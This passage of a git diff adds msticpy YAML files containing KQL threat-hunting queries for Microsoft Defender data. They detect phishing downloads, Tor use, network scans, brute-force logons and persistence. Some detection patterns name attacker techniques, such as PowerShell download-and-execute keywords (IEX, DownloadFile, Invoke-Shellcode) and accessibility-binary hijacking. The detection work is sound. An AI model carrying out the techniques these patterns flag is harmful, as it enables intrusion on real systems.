+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_files:
+    description: Lists all file events by filename
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName has "{file_name}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      file_name:
+        description: Name of file
+        type: str
+  file_path:
+    description: Lists all file events from files in a certain path
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FolderPath contains "{path}"
+        {add_query_items}'
+    parameters:
+      path:
+        description: Full or partial path to search in
+        type: str
+  list_filehash:
+    description: Lists all file events by hash
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where SHA1 == "{file_hash}" or SHA256 == "{file_hash}" or MD5 == "{file_hash}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      file_hash:
+        description: Hash of file
+        type: str
+        aliases: hash
diff --git a/msticpy/data/queries/kql_mdatp_hunting.yaml b/msticpy/data/queries/kql_mdatp_hunting.yaml
new file mode 100644
index 000000000..7d5424452
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_hunting.yaml
@@ -0,0 +1,509 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATPHunting]
+  tags: ['user']
+defaults:
+  metadata:
+    data_source: 'hunting_queries'
+  parameters:
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  doc_with_link:
+    description: Looks for a Word document attachment, from which a link was clicked, and after which there was a browser download.
+    metadata:
+    args:
+      query: '
+        let minTimeRange = ago(7d);
+        let wordLinks =
+          DeviceEvents
+          // Filter on click on links from WinWord
+          | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) and InitiatingProcessFileName =~ "winword.exe"
+          | project ClickTime=Timestamp, DeviceId, DeviceName, ClickUrl=RemoteUrl;
+        let docAttachments =
+          DeviceFileEvents
+          | where Timestamp > minTimeRange
+			    // Query for common document file extensions
+            and (FileName endswith ".docx" or FileName endswith ".docm" or FileName endswith ".doc")
+			    // Query for files saved from email clients such as the Office Outlook app or the Windows Mail app
+            and InitiatingProcessFileName in~ ("outlook.exe", "hxoutlook.exe")
+          | summarize AttachmentSaveTime=min(Timestamp) by AttachmentName=FileName, DeviceId;
+        let browserDownloads =
+          DeviceFileEvents
+          | where Timestamp > minTimeRange
+			    // Query for files created by common browsers
+            and InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe")
+            // Exclude JS files that are used for loading sites (but still query for JS files that are known to be downloaded)
+            and not (FileName endswith ".js" and isempty(FileOriginUrl))
+          // Further filter to exclude file extensions that are less indicative of an attack (when there were already previously a doc attachment that included a link)
+          | where FileName !endswith ".partial" and FileName !endswith ".docx"
+          | summarize (Timestamp, SHA1) = argmax(Timestamp, SHA1) by FileName, DeviceId, FileOriginUrl;
+        // Perf tip: start the joins from the smallest table (put it on the left-most side of the joins)
+        wordLinks
+        | join kind= inner (docAttachments) on DeviceId | where ClickTime - AttachmentSaveTime between (0min..3min)
+        | join kind= inner (browserDownloads) on DeviceId | where Timestamp - ClickTime between (0min..3min)
+        // Aggregating multiple "attachments" together - because oftentimes the same file is stored multiple times under different names
+        | summarize Attachments=makeset(AttachmentName), AttachmentSaveTime=min(AttachmentSaveTime), ClickTime=min(ClickTime)
+        by bin(Timestamp, 1tick), FileName, FileOriginUrl, ClickUrl, SHA1, DeviceName, DeviceId
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Delivery/Doc%20attachment%20with%20link%20to%20download.txt"
+    parameters:
+  dropbox_link:
+    description: Looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site.
+    metadata:
+    args:
+      query: '
+        DeviceFileEvents
+        | where
+            Timestamp > ago(7d)
+            and FileOriginUrl startswith "https://dl.dropboxusercontent.com/"
+            and isnotempty(FileOriginReferrerUrl)
+            and FileOriginReferrerUrl !startswith "https://www.dropbox.com/"
+        | project FileOriginReferrerUrl, FileName
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Delivery/Dropbox%20downloads%20linked%20from%20other%20site.txt"
+    parameters:
+  email_smartscreen:
+    description: Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning
+    metadata:
+    args:
+      query: '
+        let smartscreenAppWarnings =
+        // Query for SmartScreen warnings of unknown executed applications
+            DeviceEvents
+            | where ActionType == "SmartScreenAppWarning"
+            | project WarnTime=Timestamp, DeviceName, WarnedFileName=FileName, WarnedSHA1=SHA1, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string))
+            // Select only warnings that the user has decided to ignore and has executed the app.
+            | join kind=leftsemi (
+                    DeviceEvents
+                    | where ActionType == "SmartScreenUserOverride"
+                    | project DeviceName, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string)))
+                on DeviceName, ActivityId
+          | project-away ActivityId;
+        // Query for links opened from outlook, that are close in time to a SmartScreen warning
+        let emailLinksNearSmartScreenWarnings =
+            DeviceEvents
+            | where ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) and InitiatingProcessFileName =~ "outlook.exe"
+            | extend WasOutlookSafeLink=(tostring(parse_url(RemoteUrl).Host) endswith "safelinks.protection.outlook.com")
+            | project DeviceName, MailLinkTime=Timestamp,
+                MailLink=iff(WasOutlookSafeLink, url_decode(tostring(parse_url(RemoteUrl)["Query Parameters"]["url"])), RemoteUrl)
+            | join kind=inner smartscreenAppWarnings on DeviceName | where (WarnTime-MailLinkTime) between (0min..4min);
+        // Add the browser download event to tie in all the dots
+        DeviceFileEvents
+        | where isnotempty(FileOriginUrl) and InitiatingProcessFileName in~ ("chrome.exe", "browser_broker.exe")
+        | project FileName, FileOriginUrl, FileOriginReferrerUrl, DeviceName, Timestamp, SHA1
+        | join kind=inner emailLinksNearSmartScreenWarnings on DeviceName
+        | where (Timestamp-MailLinkTime) between (0min..3min) and (WarnTime-Timestamp) between (0min..1min)
+        | project FileName, MailLink, FileOriginUrl, FileOriginReferrerUrl, WarnedFileName, DeviceName, SHA1, WarnedSHA1, Timestamp
+        | distinct *
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Delivery/Email%20link%20%2B%20download%20%2B%20SmartScreen%20warning.txt"
+    parameters:
+  email_link:
+    description: Look for links opened from mail apps – if a detection occurred right afterwards
+    metadata:
+    args:
+      query: '
+        let minTimeRange = ago(7d);
+        let outlookLinks =
+            DeviceEvents
+            // Filter on click on links from outlook
+            | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl)
+          | where
+              // outlook.exe is the Office Outlook app
+              InitiatingProcessFileName =~ "outlook.exe"
+              // RuntimeBroker.exe opens links for all apps from the Windows store, including the Windows Mail app (HxOutlook.exe).
+              // However, it will also include some links opened from other apps.
+                  or InitiatingProcessFileName =~ "runtimebroker.exe"
+            | project Timestamp, DeviceId, DeviceName, RemoteUrl, InitiatingProcessFileName, ParsedUrl=parse_url(RemoteUrl)
+            // When applicable, parse the link sent via email from the clicked O365 ATP SafeLink
+            | extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "safelinks.protection.outlook.com")
+            | project Timestamp, DeviceId, DeviceName, WasOutlookSafeLink, InitiatingProcessFileName,
+                    OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["Query Parameters"]["url"])), RemoteUrl);
+        let alerts =
+            AlertInfo | join AlertEvidence on AlertId
+            | summarize (FirstDetectedActivity, Title)=argmin(Timestamp, Title) by AlertId, DeviceId
+            // Filter alerts that include events from before the queried time period
+            | where FirstDetectedActivity > minTimeRange;
+        // Join the two together - looking for alerts that are right after an abnormal network logon
+        alerts | join kind=inner (outlookLinks) on DeviceId | where FirstDetectedActivity - Timestamp between (0min..3min)
+        // If there are multiple alerts close to a single click-on-link, aggregate them together to a single row
+        // Note: bin(Timestamp, 1tick) is used because when summarizing by a datetime field, the default "bin" used is 1-hour.
+        | summarize FirstDetectedActivity=min(FirstDetectedActivity), AlertTitles=makeset(Title) by OpenedLink, InitiatingProcessFileName, Timestamp=bin(Timestamp, 1tick), DeviceName, DeviceId, WasOutlookSafeLink
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Delivery/Open%20email%20link.txt"
+    parameters:
+  av_sites:
+    description: Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites
+    metadata:
+    args:
+      query: '
+        let detectedDownloads =
+            DeviceEvents
+            | where ActionType == "AntivirusDetection" and isnotempty(FileOriginUrl)
+            | project Timestamp, FileOriginUrl, FileName, DeviceId,
+                      ThreatName=tostring(parse_json(AdditionalFields).ThreatName)
+            // Filter out less severe threat categories on which we do not want to pivot
+            | where ThreatName !startswith "PUA"
+                    and ThreatName !startswith "SoftwareBundler:"
+                    and FileOriginUrl != "about:internet";
+        let detectedDownloadsSummary =
+            detectedDownloads
+            // Get a few examples for each detected Host:
+            // up to 4 filenames, up to 4 threat names, one full URL)
+            | summarize DetectedUrl=any(FileOriginUrl),
+                        DetectedFiles=makeset(FileName, 4),
+                        ThreatNames=makeset(ThreatName, 4)
+                        by Host=tostring(parse_url(FileOriginUrl).Host);
+        // Query for downloads from sites from which other downloads were detected by Windows Defender Antivirus
+        DeviceFileEvents
+        | where isnotempty(FileOriginUrl)
+        | project FileName, FileOriginUrl, DeviceId, Timestamp,
+                  Host=tostring(parse_url(FileOriginUrl).Host), SHA1
+        // Filter downloads from hosts serving detected files
+        | join kind=inner(detectedDownloadsSummary) on Host
+        // Filter out download file create events that were also detected.
+        // This is needed because sometimes both of these events will be reported,
+        // and sometimes only the AntivirusDetection event - depending on timing.
+        | join kind=leftanti(detectedDownloads) on DeviceId, FileOriginUrl
+        // Summarize a single row per host - with the machines count
+        // and an example event for a missed download (select the last event)
+        | summarize MachineCount=dcount(DeviceId), arg_max(Timestamp, *) by Host
+        // Filter out common hosts, as they probably ones that also serve benign files
+        | where MachineCount < 20
+        | project Host, MachineCount, DeviceId, FileName, DetectedFiles,
+                  FileOriginUrl, DetectedUrl, ThreatNames, Timestamp, SHA1
+        | order by MachineCount desc
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Delivery/Pivot%20from%20detections%20to%20related%20downloads.txt"
+    parameters:
+  tor:
+    description: Looks for Tor client, or for a common Tor plugin called Meek.
+    metadata:
+    args:
+      query: '
+        DeviceNetworkEvents
+        | where Timestamp < ago(3d) and InitiatingProcessFileName in~ ("tor.exe", "meek-client.exe")
+        // Returns MD5 hashes of files used by Tor, to enable you to block them.
+        // We count how prevalent each file is (by machines) and show examples for some of them (up to 5 machine names per hash).
+        | summarize MachineCount=dcount(DeviceName), MachineNames=makeset(DeviceName, 5) by InitiatingProcessMD5
+        | order by MachineCount desc
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Command%20and%20Control/Tor.txt"
+    parameters:
+  network_scans:
+    description: Looking for high volume queries against a given RemoteIP, per ComputerName, RemotePort and Process
+    metadata:
+    args:
+      query: '
+        let remotePortCountThreshold = 10; // Please change the min value, for a host reaching out to remote ports on a remote IP, that you consider to be threshold for a suspicious behavior
+        DeviceNetworkEvents
+        | where Timestamp > ago(1d) and RemoteIP startswith "172.16" or RemoteIP startswith "192.168"
+        | summarize
+            by DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName
+        | summarize RemotePortCount=dcount(RemotePort) by DeviceName, RemoteIP, InitiatingProcessFileName
+        | where RemotePortCount > remotePortCountThreshold
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Command%20and%20Control/Tor.txt"
+    parameters:
+  user_enumeration:
+    description: The query finds attempts to list users or groups using Net commands
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp > ago(14d)
+        | where FileName == "net.exe" and AccountName != "" and ProcessCommandLine !contains "\\"  and ProcessCommandLine !contains "/add"
+        | where (ProcessCommandLine contains " user " or ProcessCommandLine contains " group ") and (ProcessCommandLine contains " /do" or ProcessCommandLine contains " /domain")
+        | extend Target = extract("(?i)[user|group] (\"*[a-zA-Z0-9-_ ]+\"*)", 1, ProcessCommandLine) | filter Target  != ""
+        | project AccountName, Target, ProcessCommandLine, DeviceName, Timestamp
+        | sort by AccountName, Target
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Discovery/Enumeration%20of%20users%20%26%20groups%20for%20lateral%20movement.txt"
+    parameters:
+  smb_discovery:
+    description: Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares.
+    metadata:
+    args:
+      query: '
+        DeviceNetworkEvents
+        | where RemotePort == 445 and Timestamp > ago(7d)
+            // Exclude Kernel processes, as they are too noisy in this query
+            and InitiatingProcessId !in (0, 4)
+        | summarize RemoteIPCount=dcount(RemoteIP) by DeviceName, InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessCreationTime
+        | where RemoteIPCount > 10
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Discovery/SMB%20shares%20discovery.txt"
+    parameters:
+  b64_pe:
+    description: Finding base64 encoded PE files header seen in the command line parameters
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp > ago(7d)
+        | where ProcessCommandLine contains "TVqQAAMAAAAEAAA"
+        | top 1000 by Timestamp
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/Base64encodePEFile.txt"
+    parameters:
+  malware_recycle:
+    description: Finding attackers hiding malware in the recycle bin.
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp > ago(7d)
+        | where FileName in~("cmd.exe","ftp.exe","schtasks.exe","powershell.exe","rundll32.exe","regsvr32.exe","msiexec.exe")
+        | where ProcessCommandLine contains ":\\recycler"
+        | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/Malware_In_recyclebin.txt"
+    parameters:
+  powershell_downloads:
+    description: Finds PowerShell execution events that could involve a download.
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp > ago(7d)
+        | where FileName in~ ("powershell.exe", "powershell_ise.exe")
+        | where ProcessCommandLine has "Net.WebClient"
+          or ProcessCommandLine has "DownloadFile"
+          or ProcessCommandLine has "Invoke-WebRequest"
+          or ProcessCommandLine has "Invoke-Shellcode"
+          or ProcessCommandLine has "http"
+          or ProcessCommandLine has "IEX"
+          or ProcessCommandLine has "Start-BitsTransfer"
+          or ProcessCommandLine has "mpcmdrun.exe"
+        | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
+        | top 100 by Timestamp
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowerShell%20downloads.txt"
+    parameters:
+  uncommon_powershell:
+    description: Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.
+    metadata:
+    args:
+      query: '
+        let DeviceId = "{host_name}";
+        let timestamp = datetime({timestamp});
+        let powershellCommands =
+            DeviceEvents
+            | where ActionType == "PowerShellCommand"
+            // Extract the powershell command name from the Command field in the AdditionalFields JSON column
+            | project PowershellCommand=extractjson("$.Command", AdditionalFields, typeof(string)), InitiatingProcessCommandLine, InitiatingProcessParentFileName, Timestamp, DeviceId
+            | where PowershellCommand !endswith ".ps1" and PowershellCommand !endswith ".exe";
+        // Filter Powershell cmdlets executed on relevant machine and time period
+        powershellCommands | where DeviceId == DeviceId and Timestamp between ((timestamp-5min) .. 10min)
+        // Filter out common powershell cmdlets
+        | join kind=leftanti (powershellCommands | summarize MachineCount=dcount(DeviceId) by PowershellCommand | where MachineCount > 20) on PowershellCommand
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowershellCommand%20-%20uncommon%20commands%20on%20machine.txt"
+    parameters:
+      host_name:
+        description: hostname of computer to focus query on
+        type: str
+        aliases:
+          - hostname
+      timestamp:
+        description: timestamp to base investigation scope on
+        type: str
+  cve_2018_1000006l:
+    description: Looks for CVE-2018-1000006 exploitation
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp > ago(14d)
+        | where FileName in~ ("code.exe", "skype.exe", "slack.exe", "teams.exe")
+        | where InitiatingProcessFileName in~ ("iexplore.exe", "runtimebroker.exe", "chrome.exe")
+        | where ProcessCommandLine has "--gpu-launcher"
+        | summarize FirstEvent=min(Timestamp), LastEvent=max(Timestamp) by DeviceName, ProcessCommandLine, FileName, InitiatingProcessFileName
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Exploits/Electron-CVE-2018-1000006.txt"
+    parameters:
+  cve_2018_4878:
+    description: This query checks for specific processes and domain TLD used in the CVE-2018-4878
+    metadata:
+    args:
+      query: '
+        DeviceNetworkEvents
+        | where Timestamp > ago(14d)
+        | where InitiatingProcessFileName =~ "cmd.exe" and InitiatingProcessParentFileName =~ "excel.exe"
+        | where RemoteUrl endswith ".kr"
+        | project Timestamp, DeviceName, RemoteIP, RemoteUrl
+        | top 100 by Timestamp
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Exploits/Flash-CVE-2018-4848.txt"
+    parameters:
+  cve_2018_1111:
+    description: Looks for CVE-2018-1111 exploitation
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where InitiatingProcessCommandLine contains "/etc/NetworkManager/dispatcher.d/"
+            and InitiatingProcessCommandLine contains "-dhclient"
+            and isnotempty(ProcessCommandLine)
+            and FileName !endswith ".exe"
+        | project Timestamp, DeviceName , FileName, ProcessCommandLine, InitiatingProcessCommandLine
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Exploits/Linux-DynoRoot-CVE-2018-1111.txt"
+    parameters:
+  brute_force:
+    description: Look for public IP addresses that failed to logon to a computer multiple times, using multiple accounts, and eventually succeeded.
+    metadata:
+    args:
+      query: '
+        DeviceLogonEvents
+        | where isnotempty(RemoteIP)
+            and AccountName !endswith "$"
+            and RemoteIPType == "Public"
+        | extend Account=strcat(AccountDomain, "\\", AccountName)
+        | summarize
+            Successful=countif(ActionType == "LogonSuccess"),
+            Failed = countif(ActionType == "LogonFailed"),
+            FailedAccountsCount = dcountif(Account, ActionType == "LogonFailed"),
+            SuccessfulAccountsCount = dcountif(Account, ActionType == "LogonSuccess"),
+            FailedAccounts = makeset(iff(ActionType == "LogonFailed", Account, ""), 5),
+            SuccessfulAccounts = makeset(iff(ActionType == "LogonSuccess", Account, ""), 5)
+            by DeviceName, RemoteIP, RemoteIPType
+        | where Failed > 10 and Successful > 0 and FailedAccountsCount > 2 and SuccessfulAccountsCount == 1
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Lateral%20Movement/Account%20brute%20force.txt"
+    parameters:
+  service_account_powershell:
+    description: Service Accounts Performing Remote PowerShell
+    metadata:
+    args:
+      query: '
+        let InteractiveTypes = pack_array(
+            "Interactive",
+            "CachedInteractive",
+            "Unlock",
+            "RemoteInteractive",
+            "CachedRemoteInteractive",
+            "CachedUnlock"
+        );
+        let WhitelistedCmdlets = pack_array(
+            "Out-Default",
+            "out-lineoutput",
+            "format-default",
+            "Set-StrictMode",
+            "TabExpansion2"
+        );
+        let WhitelistedAccounts = pack_array("FakeWhitelistedAccount");
+        DeviceLogonEvents
+        | where AccountName !in~ (WhitelistedAccounts)
+        | where ActionType == "LogonSuccess"
+        | where AccountName !contains "$"
+        | where AccountName !has "winrm va_"
+        | extend IsInteractive=(LogonType in (InteractiveTypes))
+        | summarize HasInteractiveLogon=max(IsInteractive)
+                    by AccountName
+        | where HasInteractiveLogon == 0
+        | join kind=rightsemi (
+          DeviceEvents
+          | where ActionType == "PowerShellCommand"
+          | where InitiatingProcessFileName =~ "wsmprovhost.exe"
+            | extend AccountName = InitiatingProcessAccountName
+        ) on AccountName
+        | extend Command = tostring(extractjson("$.Command", AdditionalFields))
+        | where Command !in (WhitelistedCmdlets)
+        | summarize (Timestamp, ReportId)=argmax(Timestamp, ReportId),
+            makeset(Command), count(), min(Timestamp) by
+            AccountName, DeviceName, DeviceId
+        | order by AccountName asc
+        | where min_Timestamp > ago(1d)
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Lateral%20Movement/ServiceAccountsPerformingRemotePS.txt"
+    parameters:
+  accessibility_persistence:
+    description: This query looks for persistence or privilege escalation done using Windows Accessibility features.
+    metadata:
+    args:
+      query: '
+        let minTime = ago(7d);
+        let accessibilityProcessNames = dynamic(["utilman.exe","osk.exe","magnify.exe","narrator.exe","displayswitch.exe","atbroker.exe","sethc.exe", "helppane.exe"]);
+        // Query for debuggers attached using a Registry setting to the accessibility processes
+        let attachedDebugger =
+            DeviceRegistryEvents
+            | where Timestamp > minTime
+            and RegistryKey startswith @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
+            and RegistryValueName =~ "debugger"
+          // Parse the debugged process name from the registry key
+            | parse RegistryKey with @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" FileName
+            | where FileName in~ (accessibilityProcessNames) and isnotempty(RegistryValueData)
+            | project Technique="AttachedDebugger", FileName, AttachedDebuggerCommandline=RegistryValueData, InitiatingProcessCommandLine, Timestamp, DeviceName;
+        // Query for overwrites of the accessibility files
+        let fileOverwiteOfAccessibilityFiles =
+            DeviceFileEvents
+            | where Timestamp > minTime
+                and FileName in~ (accessibilityProcessNames)
+                and FolderPath contains @"Windows\System32"
+            | project Technique="OverwriteFile", Timestamp, DeviceName, FileName, SHA1, InitiatingProcessCommandLine;
+        // Query for unexpected hashes of processes with names matching the accessibility processes.
+        // Specifically, query for hashes matching cmd.exe and powershell.exe, as these MS-signed general-purpose consoles are often used with this technique.
+        let executedProcessIsPowershellOrCmd =
+            DeviceProcessEvents
+            | project Technique="PreviousOverwriteFile", Timestamp, DeviceName, FileName, SHA1
+            | where Timestamp > minTime
+            | where FileName in~ (accessibilityProcessNames)
+            | join kind=leftsemi(
+                DeviceProcessEvents
+                | where Timestamp > ago(14d) and (FileName =~ "cmd.exe" or FileName =~ "powershell.exe")
+                | summarize MachinesCount = dcount(DeviceName) by SHA1
+                | where MachinesCount > 5
+                | project SHA1
+            ) on SHA1;
+        // Union all results together.
+        // An outer union is used because the schemas are a bit different between the tables - and we want to get the superset of all tables combined.
+        attachedDebugger
+        | union kind=outer fileOverwiteOfAccessibilityFiles
+        | union kind=outer executedProcessIsPowershellOrCmd
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Persistence/Accessibility%20Features.txt"
+    parameters:
+  smartscreen_ignored:
+    description: Query for SmartScreen URL blocks, where the user has decided to run the malware nontheless.
+    metadata:
+    args:
+      query: '
+        let minTimeRange = ago(7d);
+        let smartscreenUrlBlocks =
+            DeviceEvents
+            | where ActionType == "SmartScreenUrlWarning" and Timestamp > minTimeRange
+                    // Filter out SmartScreen test URLs under https://demo.smartscreen.msft.net/
+                    and RemoteUrl !startswith "https://demo.smartscreen.msft.net/"
+            | extend ParsedFields=parse_json(AdditionalFields)
+            | project Timestamp, DeviceName, BlockedUrl=RemoteUrl, Recommendation=tostring(ParsedFields.Recommendation), Experience=tostring(ParsedFields.Experience), ActivityId=tostring(ParsedFields.ActivityId);
+        // Query for UserDecision events - each one means the user has decided to ignore the warning and run the app.
+        let userIgnoredWarning=
+            DeviceEvents
+            | where ActionType == "SmartScreenUserOverride" and Timestamp > minTimeRange
+            | project DeviceName, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string));
+        // Join the block and user decision event using an ActivityId
+        let ignoredBlocks = smartscreenUrlBlocks | join kind=leftsemi (userIgnoredWarning) on DeviceName, ActivityId | project-away ActivityId;
+        // Optional additional filter - look only for cases where a file was downloaded from Microsoft Edge following the URL block being ignored
+        let edgeDownloads =
+            DeviceFileEvents
+            | where Timestamp > minTimeRange and InitiatingProcessFileName =~ "browser_broker.exe"
+            | summarize (DownloadTime, SHA1) = argmax(Timestamp, SHA1) by FileName, DeviceName, FileOriginUrl, FileOriginReferrerUrl;
+        ignoredBlocks
+        | join kind=inner (edgeDownloads) on DeviceName
+        | where DownloadTime - Timestamp between (0min .. 2min)
+        | project-away DeviceName1
+        {add_query_items}'
+      uri: "https://github.com/microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Protection%20events/SmartScreen%20URL%20block%20ignored%20by%20user.txt"
+    parameters:
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_mdatp_network.yaml b/msticpy/data/queries/kql_mdatp_network.yaml
new file mode 100644
index 000000000..292c65368
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_network.yaml
@@ -0,0 +1,94 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATP]
+  tags: ["network"]
+defaults:
+  metadata:
+    data_source: "network_events"
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceNetworkEvents"
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_connections:
+    description: Retrieves list of network connections for a host
+    metadata:
+    args:
+      query: "
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        {add_query_items}"
+      uri: None
+    parameters:
+  host_connections:
+    description: Lists alerts by for a specified hostname
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where DeviceName has "{host_name}"
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+        aliases:
+          - hostname
+  ip_connections:
+    description: Lists alerts associated with a specified remote IP
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where RemoteIP has "{ip_address}" or where LocalIP has "{ip_address}"
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: Remote IP Address
+        type: str
+  url_connections:
+    description: Lists alerts associated with a specified URL
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where RemoteUrl has "{url}"
+        {add_query_items}'
+    parameters:
+      url:
+        description: Remote URL
+        type: str
+  protocol_connections:
+    description: Lists alerts associated with a specified protocol
+    metadata:
+    args:
+      query: "
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where RemotePort == {protocol}
+        {add_query_items}"
+    parameters:
+      protocol:
+        description: Port to query for
+        type: str
diff --git a/msticpy/data/queries/kql_mdatp_process.yaml b/msticpy/data/queries/kql_mdatp_process.yaml
new file mode 100644
index 000000000..64442d594
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_process.yaml
@@ -0,0 +1,82 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATP]
+  tags: ["process"]
+defaults:
+  metadata:
+    data_source: "process_events"
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceProcessEvents"
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_host_processes:
+    description: Lists all process creations for a host
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where DeviceName has "{host_name}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  process_creations:
+    description: Lists all processes created by name or hash
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{process_identifier}" or SHA1 has "{process_identifier}" or SHA256 has "{process_identifier}" or MD5 has "{process_identifier}"
+        {add_query_items}'
+    parameters:
+      process_identifier:
+        description: Identifier for the process, filename, or hash
+        type: str
+  process_paths:
+    description: Lists all processes created from a path
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{file_path}"
+        {add_query_items}'
+    parameters:
+      file_path:
+        description: full or partial path
+        type: str
+  process_cmd_line:
+    description: Lists all processes with a command line containing a string
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
diff --git a/msticpy/data/queries/kql_mdatp_user.yaml b/msticpy/data/queries/kql_mdatp_user.yaml
